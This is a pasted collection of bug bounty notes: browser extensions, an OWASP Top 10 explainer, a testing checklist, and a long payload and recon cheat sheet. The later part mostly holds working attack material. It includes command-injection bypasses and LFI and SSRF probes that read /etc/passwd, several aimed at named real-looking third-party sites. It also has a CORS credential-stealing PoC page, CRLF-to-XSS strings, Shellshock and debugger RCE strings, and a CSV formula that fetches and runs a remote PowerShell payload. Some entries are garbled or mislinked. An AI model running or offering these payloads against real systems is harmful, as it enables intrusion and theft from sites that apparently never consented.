🌟 Useful Extensions for Bug Bounty Hunting 🌟

🌟 Useful Extensions for Bug Bounty Hunting 🌟

As bug bounty hunters, having the right tools at our disposal can make all the difference in our reconnaissance and testing efforts. Here’s a curated list of must-have Firefox extensions to enhance your workflow:

1. Waybackurl - Historical URLs fetcher [https://addons.mozilla.org/en-US/firefox/addon/shodan-addon/]

2. Vulners Web Scanner - Vulnerability database [https://addons.mozilla.org/en-US/firefox/addon/vulners-web-scanner/

3. Vt4Browsers - VirusTotal extension [https://addons.mozilla.org/en-US/firefox/addon/vt4browsers/]

4. Wayback Machine - Web archive tool [https://addons.mozilla.org/en-US/firefox/addon/wayback-machine_new/]

5. Shodan - Internet-connected devices scanner [https://addons.mozilla.org/en-US/firefox/addon/shodan-addon/]

6. TempMail - Disposable email provider [https://addons.mozilla.org/en-US/firefox/addon/temp-mail/]

7. Retire.js - JavaScript dependency scanner [https://addons.mozilla.org/en-US/firefox/addon/retire-js/

8. Privacy Badger - Tracker blocker [https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/]

9. OWASP Penetration Testing Kit - Security testing tools[https://addons.mozilla.org/en-US/firefox/addon/penetration-testing-kit/]

10. Max HackBar - Pentesting toolbar [https://addons.mozilla.org/en-US/firefox/addon/maxs-hackbar/]

11. Link Gopher - URL extractor [https://addons.mozilla.org/en-US/firefox/addon/link-gopher/]

12. Hunter - Email discovery tool [https://addons.mozilla.org/en-US/firefox/addon/hunterio/]

13. Hack-Tools - Pentesting resources [https://addons.mozilla.org/en-US/firefox/addon/hacktools/]

14. FoxyProxy - Proxy switcher [https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/]

15. Firefox Multi-Account Containers - Tab isolation [https://addons.mozilla.org/en-US/firefox/addon/multi-account-containers/

16. Dark Reader - Dark mode extension [https://addons.mozilla.org/en-US/firefox/addon/darkreader/]

17. Cookie-Editor - Cookie management [https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/]

18. Bulk URL Opener - Mass URL opener [https://addons.mozilla.org/en-US/firefox/addon/bulk-url-opener/]

19. Wappalyzer - Technology profiler [https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/]

20. WhatRuns - Tech stack identifier [https://addons.mozilla.org/en-US/firefox/addon/whatruns/]

🚀 Why Use These Extensions? These tools are essential for gathering intelligence, identifying vulnerabilities, and efficiently managing your bug bounty tasks. Whether you're fetching historical URLs, scanning for vulnerabilities, or managing your cookies, these extensions can streamline your workflow and improve your chances of success.

💡 Let’s elevate our bug hunting skills together! Feel free to share your favorite tools and any tips you have for effective bug bounty hunting. Happy hunting! 🔍💻

#BugBounty #Cybersecurity #Pentesting #Recon #Tools #FirefoxExtensions

• [ ]

OWASP Top 10 Vulnerabilities for 2024: In-Depth Explanation

The OWASP (Open Web Application Security Project) Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications. Understanding these vulnerabilities is essential for anyone involved in cybersecurity, especially for students like you, Salik, who are delving into bug bounty and penetration testing.

Let’s go through each of the OWASP Top 10 vulnerabilities for 2024, providing detailed explanations, examples, and guidance on how to mitigate these risks.

---

Visit OWASP Official Site Visit OWASP

1. Broken Access Control

Description: Access control is crucial in preventing unauthorized users from accessing sensitive information or performing actions they shouldn’t be able to. Broken access control occurs when these permissions are not correctly enforced. This can lead to unauthorized access, data leakage, and even complete system compromise.

Example: Imagine a web application that allows users to view their own invoices. If the application does not properly enforce access control, a malicious user might be able to manipulate the URL to access someone else’s invoice simply by changing an ID in the URL.

http://example.com/invoice/view/123

By changing 123 to 124, the attacker might access someone else’s invoice if access control is broken.

Mitigation:

• Implement role-based access control (RBAC).

• Use secure coding practices to enforce access permissions.

• Regularly test and review access controls.

---

2. Cryptographic Failures

Description: This refers to weaknesses in the encryption process that protect data in transit or at rest. It includes weak algorithms, improper key management, and the failure to use encryption where necessary.

Example: An application that transmits sensitive information like passwords over HTTP instead of HTTPS is vulnerable to man-in-the-middle attacks. An attacker could intercept the traffic and steal the information.

Mitigation:

• Always use strong encryption algorithms (e.g., AES-256).

• Ensure proper key management and secure key storage.

• Use HTTPS for all sensitive data transmissions.

---

3. Injection

Description: Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

Example: In a login form, if the application doesn’t properly sanitize inputs, an attacker could enter:

' OR '1'='1

This could result in bypassing authentication.

Mitigation:

• Use prepared statements with parameterized queries.

• Sanitize and validate all user inputs.

• Use ORM libraries that automatically handle input sanitization.

---

4. Insecure Design

Description: Insecure design refers to flaws in the application's design that create security vulnerabilities. This includes the absence of necessary security controls or the use of insecure patterns in the architecture.

Example: An application that doesn’t enforce password complexity requirements might allow users to create weak passwords like 12345, which are easily guessable.

Mitigation:

• Follow secure design principles from the beginning.

• Perform threat modeling and risk assessment.

• Regularly update and review design patterns.P

---

5. Security Misconfiguration

Description: Security misconfiguration is one of the most common vulnerabilities and occurs when security settings are incorrectly configured or left at insecure defaults. This can include unpatched systems, misconfigured cloud storage, and verbose error messages that reveal too much information.

Example: An application that displays detailed error messages (e.g., stack traces) to users could give an attacker clues about the underlying technology stack, making it easier to exploit vulnerabilities.

Mitigation:

• Implement a secure configuration management process.

• Disable or restrict access to unnecessary features.

• Regularly audit and update configurations.

---

6. Vulnerable and Outdated Components

Description: Using components with known vulnerabilities (e.g., libraries, frameworks, or other software modules) is a common risk. If an application includes these vulnerable components, attackers can exploit them to compromise the system.

Example: A web application that uses an outdated version of a popular JavaScript library could be susceptible to known exploits that have been patched in later versions.

Mitigation:

• Regularly update all components and dependencies.

• Use tools like Dependabot to automate dependency updates.

• Subscribe to security mailing lists to stay informed about vulnerabilities.

---

7. Identification and Authentication Failures

Description: This category involves flaws in authentication and session management. These failures could allow attackers to impersonate other users, compromising their accounts.

Example: If an application doesn’t enforce multi-factor authentication (MFA) and relies solely on passwords, an attacker who successfully guesses or cracks a user’s password can gain full access to their account.

Mitigation:

• Implement MFA wherever possible.

• Use strong, unique passwords for each account.

• Securely store authentication tokens and avoid exposing them in URLs.

---

8. Software and Data Integrity Failures

Description: This vulnerability occurs when software updates, critical data, or CI/CD pipelines are compromised. Attackers can inject malicious code, leading to unauthorized actions or data corruption.

Example: If an attacker gains access to a CI/CD pipeline and injects malicious code into a software update, every user who installs the update could be compromised.

Mitigation:

• Use digital signatures to verify the integrity of software updates.

• Secure CI/CD pipelines with proper access controls and monitoring.

• Regularly audit code and configurations.

---

9. Security Logging and Monitoring Failures

Description: Without adequate logging and monitoring, security incidents can go undetected, allowing attackers to maintain persistent access to systems. This category also includes insufficient alerting or response to detected anomalies.

Example: An application that doesn’t log failed login attempts may fail to notice a brute-force attack in progress, allowing the attacker to eventually gain access.

Mitigation:

• Implement comprehensive logging and monitoring strategies.

• Regularly review logs for suspicious activity.

• Set up alerts for critical security events.

---

10. Server-Side Request Forgery (SSRF)

Description: SSRF vulnerabilities occur when an application fetches a remote resource without validating the user-supplied URL. Attackers can exploit this to access internal services, bypassing firewalls and other protections.

Example: If a web application allows users to specify a URL to fetch data from and doesn’t validate the input, an attacker might input a URL pointing to an internal service:

http://localhost/admin

This could allow the attacker to access internal administrative functions.

Mitigation:

• Validate and sanitize all user-supplied URLs.

• Restrict the range of acceptable IP addresses and protocols.

• Use network segmentation to isolate sensitive internal services.

---

Conclusion

The OWASP Top 10 vulnerabilities for 2024 highlight the most critical security risks that developers and security professionals need to be aware of. By understanding these vulnerabilities, their examples, and mitigation strategies, you can significantly enhance the security posture of the applications you work on.

---

Visual Representation (For Better Understanding)

Here’s a simple visual design using Markdown to reinforce these concepts:

+---------------------------------------------+
|               OWASP TOP 10 (2024)           |
+---------------------------------------------+
| 1. Broken Access Control                    |
| 2. Cryptographic Failures                   |
| 3. Injection                                |
| 4. Insecure Design                          |
| 5. Security Misconfiguration                |
| 6. Vulnerable and Outdated Components       |
| 7. Identification and Authentication Failures|
| 8. Software and Data Integrity Failures     |
| 9. Security Logging and Monitoring Failures |
| 10. Server-Side Request Forgery (SSRF)      |
+---------------------------------------------+

By staying updated with these vulnerabilities and incorporating security best practices in your development and testing processes, you can contribute to creating more secure applications and systems. Happy learning, and may your journey in cybersecurity be both rewarding and impactful!

OWASP TOP 10 CL[]

The Checklist

[+] Information Gathering

Manually explore the site Spider/crawl for missed or hidden content Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store Check the caches of major search engines for publicly accessible sites Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler) Perform Web Application Fingerprinting Identify technologies used Identify user roles Identify application entry points Identify client-side code Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services) Identify co-hosted and related applications Identify all hostnames and ports Identify third-party hosted content

[+] Configuration Management

Check for commonly used application and administrative URLs Check for old, backup and unreferenced files Check HTTP methods supported and Cross Site Tracing (XST) Test file extensions handling Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS) Test for policies (e.g. Flash, Silverlight, robots) Test for non-production data in live environment, and vice-versa Check for sensitive data in client-side code (e.g. API keys, credentials)

[+] Secure Transmission

Check SSL Version, Algorithms, Key length Check for Digital Certificate Validity (Duration, Signature and CN) Check credentials only delivered over HTTPS Check that the login form is delivered over HTTPS Check session tokens only delivered over HTTPS Check if HTTP Strict Transport Security (HSTS) in use

[+] Authentication

Test for user enumeration Test for authentication bypass Test for bruteforce protection Test password quality rules Test remember me functionality Test for autocomplete on password forms/input Test password reset and/or recovery Test password change process Test CAPTCHA Test multi factor authentication Test for logout functionality presence Test for cache management on HTTP (eg Pragma, Expires, Max-age) Test for default logins Test for user-accessible authentication history Test for out-of channel notification of account lockouts and successful password changes Test for consistent authentication across applications with shared authentication schema / SSO

[+] Session Management

Establish how session management is handled in the application (eg, tokens in cookies, token in URL) Check session tokens for cookie flags (httpOnly and secure) Check session cookie scope (path and domain) Check session cookie duration (expires and max-age) Check session termination after a maximum lifetime Check session termination after relative timeout Check session termination after logout Test to see if users can have multiple simultaneous sessions Test session cookies for randomness Confirm that new session tokens are issued on login, role change and logout Test for consistent session management across applications with shared session management Test for session puzzling Test for CSRF and clickjacking

[+] Authorization

Test for path traversal Test for bypassing authorization schema Test for vertical Access control problems (a.k.a. Privilege Escalation) Test for horizontal Access control problems (between two users at the same privilege level) Test for missing authorization

[+] Data Validation

Test for Reflected Cross Site Scripting Test for Stored Cross Site Scripting Test for DOM based Cross Site Scripting Test for Cross Site Flashing Test for HTML Injection Test for SQL Injection Test for LDAP Injection Test for ORM Injection Test for XML Injection Test for XXE Injection Test for SSI Injection Test for XPath Injection Test for XQuery Injection Test for IMAP/SMTP Injection Test for Code Injection Test for Expression Language Injection Test for Command Injection Test for Overflow (Stack, Heap and Integer) Test for Format String Test for incubated vulnerabilities Test for HTTP Splitting/Smuggling Test for HTTP Verb Tampering Test for Open Redirection Test for Local File Inclusion Test for Remote File Inclusion Compare client-side and server-side validation rules Test for NoSQL injection Test for HTTP parameter pollution Test for auto-binding Test for Mass Assignment Test for NULL/Invalid Session Cookie

[+] Denial of Service

Test for anti-automation Test for account lockout Test for HTTP protocol DoS Test for SQL wildcard DoS

[+] Business Logic

Test for feature misuse Test for lack of non-repudiation Test for trust relationships Test for integrity of data Test segregation of duties

[+] Cryptography

Check if data which should be encrypted is not Check for wrong algorithms usage depending on context Check for weak algorithms usage Check for proper use of salting Check for randomness functions

[+] Risky Functionality - File Uploads

Test that acceptable file types are whitelisted Test that file size limits, upload frequency and total file counts are defined and are enforced Test that file contents match the defined file type Test that all file uploads have Anti-Virus scanning in-place. Test that unsafe filenames are sanitised Test that uploaded files are not directly accessible within the web root Test that uploaded files are not served on the same hostname/port Test that files and other media are integrated with the authentication and authorisation schemas

[+] Risky Functionality - Card Payment

Test for known vulnerabilities and configuration issues on Web Server and Web Application Test for default or guessable password Test for non-production data in live environment, and vice-versa Test for Injection vulnerabilities Test for Buffer Overflows Test for Insecure Cryptographic Storage Test for Insufficient Transport Layer Protection Test for Improper Error Handling Test for all vulnerabilities with a CVSS v2 score > 4.0 Test for Authentication and Authorization issues Test for CSRF

[+] HTML 5

Test Web Messaging Test for Web Storage SQL injection Check CORS implementation Check Offline Web Application

• [[#Bug Bounty Tips|Bug Bounty Tips]]

Bug Bounty Tips

Tip #1

Use GIT as a recon tool. Find the target's GIT repositories, clone them, and then check the logs for information on the team not necessarily in the source code. Say the target is Reddit and I want to see which developers work on certain projects.

Link

Tip #2

Look for GitLab instances on targets or belonging to the target. When you stumble across the GitLab login panel, navigate to /explore. Misconfigured instances do not require authentication to view the internal projects. Once you get in, use the search function to find passwords, keys, etc. This is a pretty big attack vector and I am finally revealing it today, because I am sure it will help a lot of you get some critical issues.

Tip #3

Bug bounty tip: test applications of a company that costs money or requires manual setup. Chances are only few to none would have tested it leaving it vulnerable.

Tip #4

If you’ve found an IDOR where you’re able to change data of others then don’t jump out of your seat to report it > modify it to XSS payload & if inputs are not sanitized & variables are echo’d without getting escaped then IDOR>XSS>ATO.

Tip #5

Look for hackathon-related assets. What I mean by this is sometimes companies run hackathons and give attendees special access to certain API endpoints and/or temporary credentials. I have found GIT instances that were set up for Hackathons full of information that allowed me to find more issues in the target several times.

Tip #6

Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports// | grep INSTALL.mysql.txt | grep 200 | less)/

Tip #7

When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score. For example, demonstrating a CSRF can be exploited simply by using [img] tag is better than having to send a link to the victim.

Bug Bounty Tip:

If you got ‘Subdomain Takeover’ don’t report it yet, look at the main site/app for gain privileges: like a potential CSP policy bypass (or session hijacking via Set-cookie: *.domain.com

Bug Bounty Tip:

if server only allows GET and POST method, then try adding “X-HTTP-Method -Override: PUT to achieve RCE via PUT method

BugBounty tip If you found that registration page without verification 1- try to create account with admin@<company.com> 2- open the account 3- found that high privilege then usual hashtag#bugbounty hashtag#bugbountytips hashtag#redteaming hashtag#rednexus hashtag#hackerone

BUG BOUNTY RECON PROCESS

subfinder -d <Target> -all -recursive > subdomain.txt

assetfinder --> assestfinder.txt

sort -u subdomain.txt assestfinder.txt > total_subdomains.txt

sudo subzy run -targets total_subdomains.txt

httpx -l urls.txt -o livehosts.txt

cat subdomain.txt|httpx-toolkit -ports 80,443,8080, 8000, 8888 -threads 200 > 
subdomains_alive.txt

cat subdomain.txt|httpx-toolkit -ports 80,443,8080, 8000, 8888 -mc 200,403,400,500 -o live.txt

cat live.txt | httpx -status-code

katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt

cat allurls.txt | grep -E "\.txt|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.json|\.gz|\.rar|\.zip|\.config"

cat allurls.txt | grep -E "\.js$" >  js.txt

cat alljs.txt | nuclei -t /home/rohit/recon/nuclei-templates-9.9.3 /http/exposures/

dirsearch -u <URL> -e conf,config, bak, backup, swp, old, db, sql,asp,aspx,aspx-,asp-, py,py-, rb, rb, php, php-, bak, bkp, cache, cgi, conf, csv, html, inc, jar, js, json, jsp, jsp-, lock, log, rar, old, sql, sql.gz,http:// sql.zip,sql.tar.gz, sql-, swp, swp-, tar, tar.bz2, tar.gz, txt,wadl, zip,.log,.xml,.js.,.json

python3 Corsy -i  subdomains_alive.txt -t 100

cat lfi.txt | nuclei -t <lfi cve> -dast

cat allurls.txt | gf redirect | openredirex -p <Payloads>

nmap -iL subdomains.txt -T4 -oN nmap_scan.txt

sqlmap -m parameters.txt --batch --level=5 --risk=3 --dbs

cat lfi_candidates.txt | xargs -I {} sh -c 'ffuf -u "{}?file=FUZZ" -w /home/rohit/recon/payloads/LFI\ payloads.txt -v -mr "root:x:0:0:" -o lfi_results_$(echo {} | sed "s/[^a-zA-Z0-9]/_/g").txt'

echo url  | gau | urldedupe -qs | gf sqli

cat endpoints.txt | gau | urldedupe -qs | gf redirect > redirect.txt
nuclei -l filename -tags xss

Command Injection Recon

                             COMMAND INJECTION RECON PROCESS

1. Subdomain Enumeration

--->

subfinder -d target.com | tee subdomains.txt

2. URL and Path Discovery

--->

gau target.com | tee urls.txt

3. Filter for Command Injection Vulnerable Endpoints using gf

--->

cat urls.txt | gf command-injection | tee cmd_injection_candidates.txt

4. Scan Command Injection Candidates with Commix

--->

 cat cmd_injection_candidates.txt | xargs -I{} commix --url={} --batch

                   (OR)

--->

nuclei -t cves/2021/command-injection.yaml -u https://target.com

5. Fuzz Parameters for Command Injection Vulnerabilities

--->

ffuf -u https://target.com/FUZZ -w /path/to/wordlist.txt -H "User-Agent: $(id)" -o ffuf-results.json

ADDTIONAL METHODS TO BYPASS

#1. Header-based Injection --->

curl -H "User-Agent: $(whoami)" https://target.com

#2. DNS Blind Command Injection Detection

---> ;

 nslookup yourdnsserver.com && ping -c 1 yourdnsserver.com

#3 . Time-based Blind Injection

--->

; sleep 10
&& ping -c 5 localhost

#4 . URL Encoding:

--->

%26%26whoami

#5. Whitespace Manipulation

--->

; ping${IFS}-c${IFS}4${IFS}localhost

lfi recon

1. subfinder -d ravagedband.com | httpx-toolkit | gau | uro | gf lfi | tee ravagedband.txt

   nuclei -list ravagedband.txt -tags lfi

2. echo 'https://arc.iram.fr/' | gau | uro | gf lfi

   nuclei -target 'https://arc.iram.fr/home.php?page=about.php' -tags lfi

3. http://lars-seeberg.com

   nuclei -target 'http://lars-seeberg.com ' -tags lfi

4. https://mylocal.life/index.php?page=contact.php

   nuclei -target 'https://mylocal.life/index.php?page=contact.php' -tags lfi

   dotdotpwn -m http-url -d 10 -f /etc/passwd -u "https://mylocal.life/index.php/pandora_console/ajax.php?page=TRAVERSAL" -b -k "root:"

   subfinder -d mylocal.life | httpx-toolkit | gau | uro | gf lfi | qsreplace "/etc/passwd" | while read url ; do curl -silent "$url" | grep "root:x" && echo "$url is vulnerable" ; done;

5. echo 'http://santosranch.com/?page=contact.php' | qsreplace "/etc/passwd" | while read url ; do curl -silent "$url" | grep "root:x" && echo "$url is vulnerable" ; done;

   nuclei -target 'http://santosranch.com/?page=contact.php' -tags lfi

6. echo "https://sksc.somaiya.edu" | waybackurls | gf redirect

   https://sksc.somaiya.edu/download.php?pdf_path=https%3A%2F%2Fdharma-studies.s3.ap-south-1.amazonaws.com%2FCSJ-Syllabi%2F28_CSJ_M.A.%2BJainology%2Band%2BPrakrit_July%2BAC_260820.pdf

   https://sksc.somaiya.edu/download.php?pdf_path=file:///etc/passwd

   SSRF bypass By DNS rebinding

USING FOLLOWING LINK

 http://lock.cmpxchg8b.com/rebinder.html
 https://sksc.somaiya.edu/download.php?pdf_path=http://7f000001.a3468a23.rbndr.us

                         

Vuln wordpresss site

https://thefutureafrica.com/

## Content Injection

❤ bounty pls

Cross Origin Resource Sharing (CORS)

Testing: curl --head -s 'http://example.com/api/v1/secret' -H 'Origin: http://evil.com'

Check to see what the server responds with in the Access-Control-Allow-Origin: (if anything) and if so, check if Access-Control-Allow-Credentials: true is present.

If it is trusting arbitrary origins with allow-credentials set to true, then host this HTML as a proof of concept.

<!DOCTYPE html>
<html>
<head><title>BugBounty CheatSheet</title></head>
<body>
<center>
<h2>CORs POC</h2>

<textarea rows="10" cols="60" id="pwnz">
</textarea><br>
<button type="button" onclick="cors()">Exploit</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("pwnz").innerHTML = this.responseText;
    }
  };
  xhttp.open("GET", "http://example.com/api/v1/topsecret", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>

CRLF Injection || HTTP Response Splitting

%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;

Header-based test, site root

%0d%0aheader:header

%0aheader:header

%0dheader:header

%23%0dheader:header

%3f%0dheader:header

/%250aheader:header

/%25250aheader:header

/%%0a0aheader:header

/%3f%0dheader:header

/%23%0dheader:header

/%25%30aheader:header

/%25%30%61header:header

/%u000aheader:header

CRLF chained with Open Redirect server misconfiguration

Note: This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)

//www.google.com/%2f%2e%2e%0d%0aheader:header

/www.google.com/%2e%2e%2f%0d%0aheader:header

/google.com/%2F..%0d%0aheader:header

Twitter specific CRLF by @filedescriptor

%E5%98%8A%E5%98%8Dheader:header

CRLF Injection to XSS

%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

Response splitting on 302 Redirect, before Location header (Discovered in DoD)

%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E

Response splitting on 301 code, chained with Open Redirect to corrupt location header and to break 301 by @black2fan (Facebook bug)

Note: xxx:1 was used for breaking open redirect destination (Location header). Great example how of to escalate CRLF to XSS on a such, it would seem, unexploitable 301 status code.

%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr

Crypto

MD5 Collision Strings

%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

URL decode strings.

SHA-1 Collision Strings

%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%73%46%DC%91%66%B6%7E%11%8F%02%9A%B6%21%B2%56%0F%F9%CA%67%CC%A8%C7%F8%5B%A8%4C%79%03%0C%2B%3D%E2%18%F8%6D%B3%A9%09%01%D5%DF%45%C1%4F%26%FE%DF%B3%DC%38%E9%6A%C2%2F%E7%BD%72%8F%0E%45%BC%E0%46%D2%3C%57%0F%EB%14%13%98%BB%55%2E%F5%A0%A8%2B%E3%31%FE%A4%80%37%B8%B5%D7%1F%0E%33%2E%DF%93%AC%35%00%EB%4D%DC%0D%EC%C1%A8%64%79%0C%78%2C%76%21%56%60%DD%30%97%91%D0%6B%D0%AF%3F%98%CD%A4%BC%46%29%B1

%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%7F%46%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2%56%0B%45%CA%67%D6%88%C7%F8%4B%8C%4C%79%1F%E0%2B%3D%F6%14%F8%6D%B1%69%09%01%C5%6B%45%C1%53%0A%FE%DF%B7%60%38%E9%72%72%2F%E7%AD%72%8F%0E%49%04%E0%46%C2%30%57%0F%E9%D4%13%98%AB%E1%2E%F5%BC%94%2B%E3%35%42%A4%80%2D%98%B5%D7%0F%2A%33%2E%C3%7F%AC%35%14%E7%4D%DC%0F%2C%C1%A8%74%CD%0C%78%30%5A%21%56%64%61%30%97%89%60%6B%D0%BF%3F%98%CD%A8%04%46%29%A1

URL decode strings.

Bcrypt (BSD) Wraparound Bug

$2a$ Bcrypt hashes were vulnerable to a wraparound bug where the first string in the list below would output the same hash as the next strings.

000000000000000000000000000000000000000000000000000000000000000000000000

012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234

0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345

Length extension attack

In cryptography and computer security, a length extension attack is a type of attack where an attacker can use Hash(message1) and the length of message1 to calculate Hash(message1 ∥ message2) for an attacker-controlled message2.

In Summary: Given a hash that is composed of a string with an unknown prefix, an attacker can append to the string and produce a new hash that still has the unknown prefix.

An example:

http://example.com/download?file=report.pdf&mac=563162c9c71a17367d44c165b84b85ab59d036f9

http://example.com/download?file=report.pdf%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00

%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00

%00%00%A8/../../../../../../../etc/passwd&mac=ee40aa8ec0cfafb7e2ec4de20943b673968857a5

A related HackerOne report: https://hackerone.com/reports/251572

Tool to extend a hash: https://github.com/iagox86/hash_extender

More details about the attack:

https://www.whitehatsec.com/blog/hash-length-extension-attacks/ https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks

CSV Injection

Newline character

%0A-3+3+cmd|' /C calc'!D2

Meterpreter Shell

=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0

RCE

Werkzeug Debugger

Find somewhere where user input can be supplied and submit the following string to cause an error:

strіng

If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: ***-***-***.

Basic Bypasses

i'''d
i"""d

\l\s -l\a\h

cat /e?c/p?ss??
cat /e??/??ss*

{ls,}
{ls,-a}

Shellshock Bug

() { :;}; echo vulnerable

curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/

Special Tools

Resolution

• http://dnsbin.zhack.ca (DNS)

• http://pingb.in (DNS)

• https://www.mockbin.org/ (HTTP)

Wildcard DNS

• http://xip.io

10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io

• http://nip.io

10.0.0.1.nip.io
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io

Reconnaissance

• https://spyse.com (fully-fledged recon service)

• https://dnsdumpster.com (DNS and subdomain recon)

• Reverse IP Lookup (Domainmonitor)

• Security headers (Security Report, missing headers)

• http://threatcrowd.org (WHOIS, DNS, email, and subdomain recon)

• https://mxtoolbox.com (wide range of DNS-related recon tools)

• https://publicwww.com/ (Source Code Search Engine)

• http://ipv4info.com/ (Find domains in the IP block owned by a Company/Organization)

• HackerTarget Tools (DNS recon, site lookup, and scanning tools)

• VirusTotal (WHOIS, DNS, and subdomain recon)

• crt.sh (SSL certificate search)

• Google CT (SSL certificate transparency search)

• PenTest Tools (Google dorks)

• Wayback Machine (Find stuff which was hosted on the domain in past)

• FindSubdomains (Find subdomains using domain or keywords)

Report Templates

• https://github.com/fransr/template-generator

• https://github.com/ZephrFish/BugBountyTemplates

Certspotter

curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq

curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq | dig +short -f - | uniq | nmap -T5 -Pn -sS -i - -p 80,443,21,22,8080,8081,8443 --open -n -oG -

Sublist3r One-liner

This runs Sublist3r on a list of domains and outputs the results in separate files.

. <(cat domains | xargs -n1 -i{} python sublist3r.py -d {} -o {}.txt)

Apktool to LinkFinder

apktool d app.apk; cd app;mkdir collection; find . -name \*.smali -exec sh -c "cp {} collection/\$(head /dev/urandom | md5 | cut -d' ' -f1).smali" \;; linkfinder -i 'collection/*.smali' -o cli

Aquatone One-liner

$ echo "aquatone-discover -d \$1 && aquatone-scan -d \$1 --ports huge && aquatone-takeover -d \$1 && aquatone-gather -d \$1" >> aqua.sh && chmod +x aqua.sh
$./aqua.sh domain.com

relative-url-extractor

$ ruby extract.rb demo-file.js
$ ruby extract.rb https://hackerone.com/some-file.js
$ ruby extract.rb '|cat demo-file.js' -c

Open Redirect

/%09/google.com

/%5cgoogle.com
